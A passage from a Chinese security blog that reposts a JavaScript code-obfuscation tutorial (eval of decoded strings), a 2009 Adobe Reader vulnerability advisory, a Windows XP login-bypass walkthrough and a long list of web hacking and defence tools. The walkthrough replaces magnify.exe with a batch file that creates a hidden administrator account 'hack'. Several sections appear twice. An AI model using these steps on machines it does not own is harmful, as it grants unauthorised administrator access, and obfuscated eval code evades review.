運行得到加密結果為:o%CD%D1%D7%E6%9CJ%u9EF3%uFA73%uF1D4%u14F1%u7EE1Kd
相應的加密後解密的代碼如下:
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> function uncompile(code) { code=unescape(code); var c=String.fromCharCode(code.charCodeAt(0)-code.length); for(var i=1;i<code.length;i++){ c+=String.fromCharCode(code.charCodeAt(i)-c.charCodeAt(i-1)); } return c; } eval(uncompile("o%CD%D1%D7%E6%9CJ%u9EF3%uFA73%uF1D4%u14F1%u7EE1Kd")); </SCRIPT>七:錯誤的利用
利用try{}catch(e){}結構對代碼進行測試解密,雖然這個想法很好(呵呵,誇誇自己),因為實用性不大,我僅給個例子
以下是代碼片段:
<SCRIPT LANGUAGE="JavaScript"> var a='alert("黑客防線");'; var c=""; for(var i=0;i<a.length;i++){ c+=String.fromCharCode(a.charCodeAt(i)^61);} alert(c); //上面的是加密代碼,當然如果真正使用這個方法時,不會把加密寫上的 //現在變量c就是加密後的代碼 //下面的函數t()先假設初始密碼為0,解密執行, //遇到錯誤則把密碼加1,然後接著解密執行,直到正確運行 以下是代碼片段: var d=c; //保存加密後的代碼 var b=0; //假定初始密碼為0 t(); function t()catch(e){ c=""; for(var i=0;i<d.length;i++){ c+=String.fromCharCode(d.charCodeAt(i)^b);} b+=1; t(); //setTimeout("t()",0); } } </SCRIPT>
註: 本文轉載自網路 非原創
轉載自 邪惡八進制信息安全團隊Adobe Reader再度出現漏洞(Remote Code-execution)
Info:
Published: Oct 08 2009 12:00AM
Updated: Oct 08 2009 11:59PM
Credit: Chia-Ching Fang and the Information and Communication Security Technology Service Center
Vulnerable: ALL
Discussion:
Adobe Acrobat Reader is prone to a remote code-execution vulnerability.
An attacker can exploit this issue by supplying a malicious PDF file. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Solution:
The vendor plans to releases updates for this issue on October 13, 2009.
Published: Oct 08 2009 12:00AM
Updated: Oct 08 2009 11:59PM
Credit: Chia-Ching Fang and the Information and Communication Security Technology Service Center
Vulnerable: ALL
Discussion:
Adobe Acrobat Reader is prone to a remote code-execution vulnerability.
An attacker can exploit this issue by supplying a malicious PDF file. Successful exploits may allow the attacker to execute arbitrary code in the context of a user running the affected application. Failed attempts will likely result in denial-of-service conditions.
Solution:
The vendor plans to releases updates for this issue on October 13, 2009.
註: 本文轉載自網路 非原創
轉載自 SecurityFocus 原文2009年9月26日 星期六
僅用隨身碟就可以去除win XP管理員密碼
有許多朋友還在為忘記XP登陸密碼不能進入系統而煩惱,筆者現在將給用戶介紹一個小方法,解決忘記密碼給你帶來的煩惱。
一、所需工具
1.U盤一個
2.USBoot(U盤啟動製作軟件)
3.winRAR(壓縮軟件)
首先聲明,此方法是在文件格式為FAT32的狀態下進行的!
二、思路
方法很簡單,當你的機器出現登陸框,要求輸入密碼時,你按下windows鍵+U,是否出現了輔助工具管理工具,既然可以運行輔助工具,那就意味著可以 運行放大鏡。我們把放大鏡程序換成其他的程序是不是也可以運行呢?想一下如果我們加入用戶添加項目會怎樣?思路就是這樣的了!現在我們開始製作。
三、步驟
①製作U盤啟動盤。先運行Usboot,然後插入U盤,選中U盤然後點開始。格式化U盤,然後它會提示你再插入,插入U盤1分後就可以了!我的U盤是1G的,用的HDD格式。
②製作替換文件。要製作一個XX.EXE的文件來替換原文件,但是這個XX.EXE執行後又要達到添加用戶的要求。我首先想到的是寫一個批處理文件:
@net user hack 123456 /add
@net localgroup administrators hack /add
@exit
然後保存為XX.bat就可以了!
又有人要問,我們要的是XX.EXE為什麼卻弄個XX.bat?
其實我們讓它運行XX.EXE就等同運行了XX.bat就可以了!要達到這樣的目的,就要用到winrar,用winrar製作一個自解壓文件,不就把XX.bat變成XX.EXE了嗎?運行XX.EXE就等同運行了XX.bat.(把XX.EXE拷到 U 盤上去)
③替換文件.到COMS裡去把第一啟動換到USB-HDD,保存----插入U盤,進入系統的c:\windows\systaem32下 去. copy magnify.exe 007magnify.exe (對magnify.exe進行備份,magnify.exe為放大鏡執行程 序).在把U盤上的XX.EXE拷到system32下,並該為 magnify.exe就可以了!
然後從硬盤啟動就可以了!再到XP登陸密碼時,你只要運行放大鏡就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用戶就可以進去了!進去把管理員密碼改過來吧!
這樣就成功的繞過了XP的登陸密碼,只要了一個U盤,是否很方便?
一、所需工具
1.U盤一個
2.USBoot(U盤啟動製作軟件)
3.winRAR(壓縮軟件)
首先聲明,此方法是在文件格式為FAT32的狀態下進行的!
二、思路
方法很簡單,當你的機器出現登陸框,要求輸入密碼時,你按下windows鍵+U,是否出現了輔助工具管理工具,既然可以運行輔助工具,那就意味著可以 運行放大鏡。我們把放大鏡程序換成其他的程序是不是也可以運行呢?想一下如果我們加入用戶添加項目會怎樣?思路就是這樣的了!現在我們開始製作。
三、步驟
①製作U盤啟動盤。先運行Usboot,然後插入U盤,選中U盤然後點開始。格式化U盤,然後它會提示你再插入,插入U盤1分後就可以了!我的U盤是1G的,用的HDD格式。
②製作替換文件。要製作一個XX.EXE的文件來替換原文件,但是這個XX.EXE執行後又要達到添加用戶的要求。我首先想到的是寫一個批處理文件:
@net user hack 123456 /add
@net localgroup administrators hack /add
@exit
然後保存為XX.bat就可以了!
又有人要問,我們要的是XX.EXE為什麼卻弄個XX.bat?
其實我們讓它運行XX.EXE就等同運行了XX.bat就可以了!要達到這樣的目的,就要用到winrar,用winrar製作一個自解壓文件,不就把XX.bat變成XX.EXE了嗎?運行XX.EXE就等同運行了XX.bat.(把XX.EXE拷到 U 盤上去)
③替換文件.到COMS裡去把第一啟動換到USB-HDD,保存----插入U盤,進入系統的c:\windows\systaem32下 去. copy magnify.exe 007magnify.exe (對magnify.exe進行備份,magnify.exe為放大鏡執行程 序).在把U盤上的XX.EXE拷到system32下,並該為 magnify.exe就可以了!
然後從硬盤啟動就可以了!再到XP登陸密碼時,你只要運行放大鏡就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用戶就可以進去了!進去把管理員密碼改過來吧!
這樣就成功的繞過了XP的登陸密碼,只要了一個U盤,是否很方便?
註: 本文轉載自網路 非原創
轉載自 葉子'sBlog 原文2009年9月20日 星期日
Web安全工具大匯聚
Test sites / testing grounds
SPI Dynamics (live) – http://zero.webappsecurity.com/Cenzic (live) – http://crackme.cenzic.com/
Watchfire (live) – http://demo.testfire.net/
Acunetix (live) – http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank – http://www.mavensecurity.com/webmaven
Foundstone SASS tools – http://www.foundstone.com/us/resources-free-tools.asp
Updated HackmeBank – http://www.o2-ounceopen.com/technical-info/2008/12/8/updated-version-of-hacmebank.html
OWASP WebGoat – http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator – http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench – http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro – http://suif.stanford.edu/~livshits/work/securibench-micro/
HTTP proxying / editing
WebScarab – http://www.owasp.org/index.php/Category:OWASP_WebScarab_ProjectBurp – http://www.portswigger.net/
Paros – http://www.parosproxy.org/
Fiddler – http://www.fiddlertool.com/
Web Proxy Editor – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
Pantera – http://www.owasp.org/index.php/Category:OWASP_Pantera_Web_Assessment_Studio_Project
Suru – http://www.sensepost.com/research/suru/
httpedit (curses-based) – http://www.neutralbit.com/en/rd/httpedit/
Charles – http://www.xk72.com/charles/
Odysseus – http://www.bindshell.net/tools/odysseus
Burp, Paros, and WebScarab for Mac OS X – http://www.corsaire.com/downloads/
Web-application scanning tool from `Network Security Tools'/O'Reilly – http://examples.oreilly.com/networkst/
JS Commander – http://jscmd.rubyforge.org/
Ratproxy – http://code.google.com/p/ratproxy/
RSnake's XSS cheat sheet based-tools, webapp fuzzing, and encoding tools
Wfuzz – http://www.edge-security.com/wfuzz.phpProxMon – http://www.isecpartners.com/proxmon.html
Wapiti – http://wapiti.sourceforge.net/
Grabber – http://rgaucher.info/beta/grabber/
XSSScan – http://darkcode.ath.cx/scanners/XSSscan.py
CAL9000 – http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project
HTMangLe – http://www.fishnetsecurity.com/Tools/HTMangLe/publish.htm
JBroFuzz – http://sourceforge.net/projects/jbrofuzz
XSSFuzz – http://ha.ckers.org/blog/20060921/xssfuzz-released/
WhiteAcid's XSS Assistant – http://www.whiteacid.org/greasemonkey/
Overlong UTF – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
[TGZ] MielieTool (SensePost Research) – http://packetstormsecurity.org/UNIX/utilities/mielietools-v1.0.tgz
RegFuzzer: test your regular expression filter – http://rgaucher.info/b/index.php/post/2007/05/26/RegFuzzer%3A-Test-your-regular-expression-filter
screamingCobra – http://www.dachb0den.com/projects/screamingcobra.html
SPIKE and SPIKE Proxy – http://immunitysec.com/resources-freesoftware.shtml
RFuzz – http://rfuzz.rubyforge.org/
WebFuzz – http://www.codebreakers-journal.com/index.php?option=com_content&task=view&id=112&Itemid=99999999
TestMaker – http://www.pushtotest.com/Docs/downloads/features.html
ASP Auditor – http://michaeldaw.org/projects/asp-auditor-v2/
WSTool – http://wstool.sourceforge.net/
Web Hack Control Center (WHCC) – http://ussysadmin.com/whcc/
Web Text Converter – http://www.microsoft.com/mspress/companion/0-7356-2187-X/
HackBar (Firefox Add-on) – https://addons.mozilla.org/firefox/3899/
Net-Force Tools (NF-Tools, Firefox Add-on) – http://www.net-force.nl/library/downloads/
PostIntercepter (Greasemonkey script) – http://userscripts.org/scripts/show/743
HTTP general testing / fingerprinting
Wbox: HTTP testing tool – http://hping.org/wbox/ht://Check – http://htcheck.sourceforge.net/
Mumsie – http://www.lurhq.com/tools/mumsie.html
WebInject – http://www.webinject.org/
Torture.pl Home Page – http://stein.cshl.org/~lstein/torture/
JoeDog's Seige – http://www.joedog.org/JoeDog/Siege/
OPEN-LABS: metoscan (http method testing) – http://www.open-labs.org/
Load-balancing detector – http://ge.mine.nu/lbd.html
HMAP – http://ujeni.murkyroc.com/hmap/
Net-Square: httprint – http://net-square.com/httprint/
Wpoison: http stress testing – http://wpoison.sourceforge.net/
Net-square: MSNPawn – http://net-square.com/msnpawn/index.shtml
hcraft: HTTP Vuln Request Crafter – http://druid.caughq.org/projects/hcraft/
rfp.labs: LibWhisker – http://www.wiretrip.net/rfp/lw.asp
Nikto – http://www.cirt.net/code/nikto.shtml
twill – http://twill.idyll.org/
DirBuster – http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
[ZIP] DFF Scanner – http://security-net.biz/files/dff/DFF.zip
[ZIP] The Elza project – http://packetstormsecurity.org/web/elza-1.4.7-beta.zip http://www.stoev.org/elza.html
HackerFox and Hacking Addons Bundled: Portable Firefox with web hacking addons bundled – http://sf.net/projects/hackfox
Browser-based HTTP tampering / editing / replaying
TamperIE – http://www.bayden.com/Other/isr-form – http://www.infobyte.com.ar/developments.html
Modify Headers (Firefox Add-on) – http://modifyheaders.mozdev.org/
Tamper Data (Firefox Add-on) – http://tamperdata.mozdev.org/
UrlParams (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1290/
TestGen4Web (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1385/
DOM Inspector / Inspect This (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1806/ https://addons.mozilla.org/en-US/firefox/addon/1913/
LiveHTTPHeaders / Header Monitor (Firefox Add-on) – http://livehttpheaders.mozdev.org/ https://addons.mozilla.org/en-US/firefox/addon/575/
Cookie editing / poisoning
[TGZ] stompy: session id tool – http://lcamtuf.coredump.cx/stompy.tgzAdd'N Edit Cookies (AnEC, Firefox Add-on) – http://addneditcookies.mozdev.org/
CookieCuller (Firefox Add-on) – http://cookieculler.mozdev.org/
CookiePie (Firefox Add-on) – http://www.nektra.com/oss/firefox/extensions/cookiepie/
CookieSpy – http://www.codeproject.com/shell/cookiespy.asp
Cookies Explorer – http://www.dutchduck.com/Features/Cookies.aspx
Ajax and XHR scanning
Sahi – http://sahi.co.in/scRUBYt – http://scrubyt.org/
jQuery – http://jquery.com/
jquery-include – http://www.gnucitizen.org/projects/jquery-include
Sprajax – http://www.denimgroup.com/sprajax.html
Watir – http://wtr.rubyforge.org/
Watij – http://watij.com/
Watin – http://watin.sourceforge.net/
RBNarcissus – http://idontsmoke.co.uk/2005/rbnarcissus/
SpiderTest (Spider Fuzz plugin) – http://blog.caboo.se/articles/2007/2/21/the-fabulous-spider-fuzz-plugin
Javascript Inline Debugger (jasildbg) – http://jasildbg.googlepages.com/
Firebug Lite – http://www.getfirebug.com/lite.html
firewaitr – http://code.google.com/p/firewatir/
RSS extensions and caching
LiveLines (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/324/rss-cache – http://www.dubfire.net/chris/projects/rss-cache/
SQL injection scanning
0×90.org: home of Absinthe, Mezcal, etc – http://0×90.org/releases.phpSQLiX – http://www.owasp.org/index.php/Category:OWASP_SQLiX_Project
sqlninja: a SQL Server injection and takover tool – http://sqlninja.sourceforge.net/
JustinClarke's SQL Brute – http://www.justinclarke.com/archives/2006/03/sqlbrute.html
BobCat – http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html
sqlmap – http://sqlmap.sourceforge.net/
Scully: SQL Server DB Front-End and Brute-Forcer – http://www.sensepost.com/research/scully/
FG-Injector – http://www.flowgate.net/?lang=en&seccion=herramientas
PRIAMOS – http://www.priamos-project.com/
Web application security malware, backdoors, and evil code
W3AF: Web Application Attack and Audit Framework – http://w3af.sourceforge.net/Jikto – http://busin3ss.name/jikto-in-the-wild/
XSS Shell – http://ferruh.mavituna.com/article/?1338
XSS-Proxy – http://xss-proxy.sourceforge.net
AttackAPI – http://www.gnucitizen.org/projects/attackapi/
FFsniFF – http://azurit.elbiahosting.sk/ffsniff/
HoneyBlog's web-based junkyard – http://honeyblog.org/junkyard/web-based/
BeEF – http://www.bindshell.net/tools/beef/
Firefox Extension Scanner (FEX) – http://www.gnucitizen.org/projects/fex/
What is my IP address? – http://reglos.de/myaddress/
xRumer: blogspam automation tool – http://www.botmaster.net/movies/XFull.htm
SpyJax – http://www.merchantos.com/makebeta/tools/spyjax/
Greasecarnaval – http://www.gnucitizen.org/projects/greasecarnaval
Technika – http://www.gnucitizen.org/projects/technika/
Load-AttackAPI bookmarklet – http://www.gnucitizen.org/projects/load-attackapi-bookmarklet
MD's Projects: JS port scanner, pinger, backdoors, etc – http://michaeldaw.org/my-projects/
Web application services that aid in web application security assessment
Netcraft – http://www.netcraft.netAboutURL – http://www.abouturl.com/
The Scrutinizer – http://www.scrutinizethis.com/
net.toolkit – http://clez.net/
ServerSniff – http://www.serversniff.net/
Online Microsoft script decoder – http://www.greymagic.com/security/tools/decoder/
Webmaster-Toolkit – http://www.webmaster-toolkit.com/
myIPNeighbbors, et al – http://digg.com/security/MyIPNeighbors_Find_Out_Who_Else_is_Hosted_on_Your_Site_s_IP_Address
PHP charset encoding – http://h4k.in/encoding
data: URL testcases – http://h4k.in/dataurl
Browser-based security fuzzing / checking
Zalewski's MangleMe – http://lcamtuf.coredump.cx/mangleme/mangle.cgihdm's tools: Hamachi, CSSDIE, DOM-Hanoi, AxMan – http://metasploit.com/users/hdm/tools/
Peach Fuzzer Framework – http://peachfuzz.sourceforge.net/
TagBruteForcer – http://research.eeye.com/html/tools/RT20060801-3.html
PROTOS Test-Suite: c05-http-reply – http://www.ee.oulu.fi/research/ouspg/protos/testing/c05/http-reply/index.html
COMRaider – http://labs.idefense.com
bcheck – http://bcheck.scanit.be/bcheck/
Stop-Phishing: Projects page – http://www.indiana.edu/~phishing/?projects
LinkScanner – http://linkscanner.explabs.com/linkscanner/default.asp
BrowserCheck – http://www.heise-security.co.uk/services/browsercheck/
Cross-browser Exploit Tests – http://www.jungsonnstudios.com/cool.php
Stealing information using DNS pinning demo – http://www.jumperz.net/index.php?i=2&a=1&b=7
Javascript Website Login Checker – http://ha.ckers.org/weird/javascript-website-login-checker.html
Mozilla Activex – http://www.iol.ie/~locka/mozilla/mozilla.htm
Jungsonn's Black Dragon Project – http://blackdragon.jungsonnstudios.com/
Mr. T (Master Recon Tool, includes Read Firefox Settings PoC) – http://ha.ckers.org/mr-t/
Vulnerable Adobe Plugin Detection For UXSS PoC – http://www.0×000000.com/?i=324
About Flash: is your flash up-to-date? – http://www.macromedia.com/software/flash/about/
Test your installation of Java software – http://java.com/en/download/installed.jsp?detect=jre&try=1
WebPageFingerprint – Light-weight Greasemonkey Fuzzer – http://userscripts.org/scripts/show/30285
PHP static analysis and file inclusion scanning
PHP-SAT.org: Static analysis for PHP – http://www.program-transformation.org/PHP/Unl0ck Research Team: tool for searching in google for include bugs – http://unl0ck.net/tools.php
FIS: File Inclusion Scanner – http://www.segfault.gr/index.php?cat_id=3&cont_id=25
PHPSecAudit – http://developer.spikesource.com/projects/phpsecaudit
PHP Defensive Tools
PHPInfoSec – Check phpinfo configuration for security – http://phpsec.org/projects/phpsecinfo/A Greasemonkey Replacement can be found at http://yehg.net/lab/#tools.greasemonkey
Php-Brute-Force-Attack Detector – Detect your web servers being scanned by brute force tools such as WFuzz, OWASP DirBuster and vulnerability scanners such as Nessus, Nikto, Acunetix ..etc. http://yehg.net/lab/pr0js/files.php/php_brute_force_detect.zip
PHP-Login-Info-Checker – Strictly enforce admins/users to select stronger passwords. It tests cracking passwords against 4 rules. It has also built-in smoke test page via url loginfo_checker.php?testlic
http://yehg.net/lab/pr0js/files.php/loginfo_checkerv0.1.zip
http://yehg.net/lab/pr0js/files.php/phploginfo_checker_demo.zip
php-DDOS-Shield – A tricky script to prevent idiot distributed bots which discontinue their flooding attacks by identifying HTTP 503 header code. http://code.google.com/p/ddos-shield/
PHPMySpamFIGHTER – http://yehg.net/lab/pr0js/files.php/phpmyspamfighter.zip http://yehg.net/lab/pr0js/files.php/phpMySpamFighter_demo.rar
Web Application Firewall (WAF) and Intrusion Detection (APIDS) rules and resources
APIDS on Wikipedia – http://en.wikipedia.org/wiki/APIDSPHP Intrusion Detection System (PHP-IDS) – http://php-ids.org/ http://code.google.com/p/phpids/
dotnetids – http://code.google.com/p/dotnetids/
Secure Science InterScout – http://www.securescience.com/home/newsandevents/news/interscout1.0.html
Remo: whitelist rule editor for mod_security – http://remo.netnea.com/
GotRoot: ModSecuirty rules – http://www.gotroot.com/tiki-index.php?page=mod_security+rules
The Web Security Gateway (WSGW) – http://wsgw.sourceforge.net/
mod_security rules generator – http://noeljackson.com/tools/modsecurity/
Mod_Anti_Tamper – http://www.wisec.it/projects.php?id=3
[TGZ] Automatic Rules Generation for Mod_Security – http://www.wisec.it/rdr.php?fn=/Projects/Rule-o-matic.tgz
AQTRONIX WebKnight – http://www.aqtronix.com/?PageID=99
Akismet: blog spam defense – http://akismet.com/
Samoa: Formal tools for securing web services – http://research.microsoft.com/projects/samoa/
Web services enumeration / scanning / fuzzing
WebServiceStudio2.0 – http://www.codeplex.com/WebserviceStudioNet-square: wsChess – http://net-square.com/wschess/index.shtml
WSFuzzer – http://www.owasp.org/index.php/Category:OWASP_WSFuzzer_Project
SIFT: web method search tool – http://www.sift.com.au/73/171/sift-web-method-search-tool.htm
iSecPartners: WSMap, WSBang, etc – http://www.isecpartners.com/tools.html
Web application non-specific static source-code analysis
Pixy: a static analysis tool for detecting XSS vulnerabilities – http://www.seclab.tuwien.ac.at/projects/pixy/Brixoft.Net: Source Edit – http://www.brixoft.net/prodinfo.asp?id=1
Security compass web application auditing tools (SWAAT) – http://www.owasp.org/index.php/Category:OWASP_SWAAT_Project
An even more complete list here – http://www.cs.cmu.edu/~aldrich/courses/654/tools/
A nice list that claims some demos available – http://www.cs.cmu.edu/~aldrich/courses/413/tools.html
A smaller, but also good list – http://spinroot.com/static/
Yasca: A highly extensible source code analysis framework; incorporates several analysis tools into one package. http://www.yasca.org/
Static analysis for C/C++ (CGI, ISAPI, etc) in web applications
RATS – http://www.securesoftware.com/resources/download_rats.htmlITS4 – http://www.cigital.com/its4/
FlawFinder – http://www.dwheeler.com/flawfinder/
Splint – http://www.splint.org/
Uno – http://spinroot.com/uno/
BOON (Buffer Overrun detectiON) – http://www.cs.berkeley.edu/~daw/boon/ http://boon.sourceforge.net
Valgrind – http://www.valgrind.org/
Java static analysis, security frameworks, and web application security tools
LAPSE – http://suif.stanford.edu/~livshits/work/lapse/HDIV Struts – http://hdiv.org/
Orizon – http://sourceforge.net/projects/orizon/
FindBugs: Find bugs in Java programs – http://findbugs.sourceforge.net/
PMD – http://pmd.sourceforge.net/
CUTE: A Concolic Unit Testing Engine for C and Java – http://osl.cs.uiuc.edu/~ksen/cute/
EMMA – http://emma.sourceforge.net/
JLint – http://jlint.sourceforge.net/
Java PathFinder – http://javapathfinder.sourceforge.net/
Fujaba: Move between UML and Java source code – http://wwwcs.uni-paderborn.de/cs/fujaba/
Checkstyle – http://checkstyle.sourceforge.net/
Cookie Revolver Security Framework – http://sourceforge.net/projects/cookie-revolver
tinapoc – http://sourceforge.net/projects/tinapoc
jarsigner – http://java.sun.com/j2se/1.5.0/docs/tooldocs/solaris/jarsigner.html
Solex – http://solex.sourceforge.net/
Java Explorer – http://metal.hurlant.com/jexplore/
HTTPClient – http://www.innovation.ch/java/HTTPClient/
another HttpClient – http://jakarta.apache.org/commons/httpclient/
a list of code coverage and analysis tools for Java – http://mythinkpond.blogspot.com/2007/06/java-foss-freeopen-source-software.html
Microsoft .NET static analysis and security framework tools, mostly for ASP.NET and ASP.NET AJAX, but also C# and VB.NET
- Visual Studio 2008 Code Analysis, available in:
- VSTS 2008 Development Edition (http://msdn.microsoft.com/vsts2008/products/bb933752.aspx) and
- VSTS 2008 Team Suite (http://msdn.microsoft.com/vsts2008/products/bb933735.aspx)
- Visual Studio 2005 Code Analyzer, available in:
- Visual Studio 2005 Team Edition for Software Developers (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
- Visual Studio 2005 Team Suite (http://msdn.microsoft.com/en-us/vstudio/aa718806.aspx)
- Web Development Helper – http://www.nikhilk.net/Project.WebDevHelper.aspx
- FxCop:
- (blog) http://blogs.msdn.com/fxcop/
- (download) http://code.msdn.microsoft.com/codeanalysis
- Microsoft internal tools you can't have yet:
- http://www.microsoft.com/windows/cse/pa_projects.mspx
- http://research.microsoft.com/Pex/
- http://www.owasp.org/images/5/5b/OWASP_IL_7_FuzzGuru.pdf
Threat modeling
Microsoft Threat Analysis and Modeling Tool v2.1 (TAM) – http://www.microsoft.com/downloads/details.aspx?FamilyID=59888078-9daf-4e96-b7d1-944703479451&displaylang=enAmenaza: Attack Tree Modeling (SecurITree) – http://www.amenaza.com/software.php
Octotrike – http://www.octotrike.org/
Add-ons for Firefox that help with general web application security
Web Developer Toolbar – https://addons.mozilla.org/firefox/60/Plain Old Webserver (POW) – https://addons.mozilla.org/firefox/3002/
XML Developer Toolbar – https://addons.mozilla.org/firefox/2897/
Public Fox – https://addons.mozilla.org/firefox/3911/
XForms Buddy – http://beaufour.dk/index.php?sec=misc&pagename=xforms
MR Tech Local Install – http://www.mrtech.com/extensions/local_install/
Nightly Tester Tools – http://users.blueprintit.co.uk/~dave/web/firefox/buildid/index.html
IE Tab – https://addons.mozilla.org/firefox/1419/
User-Agent Switcher – https://addons.mozilla.org/firefox/59/
ServerSwitcher – https://addons.mozilla.org/firefox/2409/
HeaderMonitor – https://addons.mozilla.org/firefox/575/
RefControl – https://addons.mozilla.org/firefox/953/
refspoof – https://addons.mozilla.org/firefox/667/
No-Referrer – https://addons.mozilla.org/firefox/1999/
LocationBar^2 – https://addons.mozilla.org/firefox/4014/
SpiderZilla – http://spiderzilla.mozdev.org/
Slogger – https://addons.mozilla.org/en-US/firefox/addon/143
Fire Encrypter – https://addons.mozilla.org/firefox/3208/
Add-ons for Firefox that help with Javascript and Ajax web application security
Selenium IDE – http://www.openqa.org/selenium-ide/Firebug – http://www.joehewitt.com/software/firebug/
Venkman – http://www.mozilla.org/projects/venkman/
Chickenfoot – http://groups.csail.mit.edu/uid/chickenfoot/
Greasemonkey – http://www.greasespot.net/
Greasemonkey compiler – http://www.letitblog.com/greasemonkey-compiler/
User script compiler – http://arantius.com/misc/greasemonkey/script-compiler
Extension Developer's Extension (Firefox Add-on) – http://ted.mielczarek.org/code/mozilla/extensiondev/
Smart Middle Click (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/3885/
Bookmarklets that aid in web application security
RSnake's security bookmarklets – http://ha.ckers.org/bookmarklets.htmlBMlets – http://optools.awardspace.com/bmlet.html
Huge list of bookmarklets – http://www.squarefree.com/bookmarklets/
Blummy: consists of small widgets, called blummlets, which make use of Javascript to provide rich functionality – http://www.blummy.com/
Bookmarklets every blogger should have – http://www.micropersuasion.com/2005/10/bookmarklets_ev.html
Flat Bookmark Editing (Firefox Add-on) – http://n01se.net/chouser/proj/mozhack/
OpenBook and Update Bookmark (Firefox Add-ons) – http://www.chuonthis.com/extensions/
SSL certificate checking / scanning
[ZIP] THCSSLCheck – http://thc.org/root/tools/THCSSLCheck.zip[ZIP] Foundstone SSLDigger – http://www.foundstone.com/us/resources/termsofuse.asp?file=ssldigger.zip
Cert Viewer Plus (Firefox Add-on) – https://addons.mozilla.org/firefox/1964/
Honeyclients, Web Application, and Web Proxy honeypots
Honeyclient Project: an open-source honeyclient – http://www.honeyclient.org/trac/HoneyC: the low-interaction honeyclient – http://honeyc.sourceforge.net/
Capture: a high-interaction honeyclient – http://capture-hpc.sourceforge.net/
Google Hack Honeypot – http://ghh.sourceforge.net/
PHP.Hop – PHP Honeynet Project – http://www.rstack.org/phphop/
SpyBye – http://www.monkey.org/~provos/spybye/
Honeytokens – http://www.securityfocus.com/infocus/1713
Blackhat SEO and maybe some whitehat SEO
SearchStatus (Firefox Add-on) – http://www.quirk.biz/searchstatus/SEO for Firefox (Firefox Add-on) – http://tools.seobook.com/firefox/seo-for-firefox.html
SEOQuake (Firefox Add-on) – http://www.seoquake.com/
Footprinting for web application security
Evolution – http://www.paterva.com/evolution-e.htmlGooSweep – http://www.mcgrewsecurity.com/projects/goosweep/
Aura: Google API Utility Tools – http://www.sensepost.com/research/aura/
Edge-Security tools – http://www.edge-security.com/soft.php
Fierce Domain Scanner – http://ha.ckers.org/fierce/
Googlegath – http://www.nothink.org/perl/googlegath/
Advanced Dork (Firefox Add-on) – https://addons.mozilla.org/firefox/2144/
Passive Cache (Firefox Add-on) – https://addons.mozilla.org/firefox/977/
CacheOut! (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1453/
BugMeNot Extension (Firefox Add-on) – http://roachfiend.com/archives/2005/02/07/bugmenot/
TrashMail.net Extension (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1813/
DiggiDig (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2819/
Digger (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1467/
Database security assessment
Scuba by Imperva Database Vulnerability Scanner – http://www.imperva.com/scuba/Browser Defenses
DieHard – http://www.diehard-software.org/LocalRodeo (Firefox Add-on) – http://databasement.net/labs/localrodeo/
NoMoXSS – http://www.seclab.tuwien.ac.at/projects/jstaint/
Request Rodeo – http://savannah.nongnu.org/projects/requestrodeo
FlashBlock (Firefox Add-on) – http://flashblock.mozdev.org/
CookieSafe (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2497
NoScript (Firefox Add-on) – http://www.noscript.net/
FormFox (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1579/
Adblock (Firefox Add-on) – http://adblock.mozdev.org/
httpOnly in Firefox (Firefox Add-on) – http://blog.php-security.org/archives/40-httpOnly-Cookies-in-Firefox-2.0.html
SafeCache (Firefox Add-on) – http://www.safecache.com/
SafeHistory (Firefox Add-on) – http://www.safehistory.com/
PrefBar (Firefox Add-on) – http://prefbar.mozdev.org/
All-in-One Sidebar (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/1027/
QArchive.org web file checker (Firefox Add-on) – https://addons.mozilla.org/firefox/4115/
Update Notified (Firefox Add-on) – https://addons.mozilla.org/en-US/firefox/addon/2098/
FireKeeper – http://firekeeper.mozdev.org/
Greasemonkey: XSS Malware Script Detector – http://yehg.net/lab/#tools.greasemonkey
Browser Privacy
TrackMeNot (Firefox Add-on) – https://addons.mozilla.org/firefox/3173/Privacy Bird – http://www.privacybird.com/
Application and protocol fuzzing (random instead of targeted)
Sulley – http://fuzzing.org/taof: The Art of Fuzzing – http://sourceforge.net/projects/taof/
zzuf: multipurpose fuzzer – http://sam.zoy.org/zzuf/
autodafé: an act of software torture – http://autodafe.sourceforge.net/
EFS and GPF: Evolutionary Fuzzing System – http://www.appliedsec.com/resources.html
註: 本文轉載自網路 非原創
轉載自 素包子 原文
訂閱:
文章 (Atom)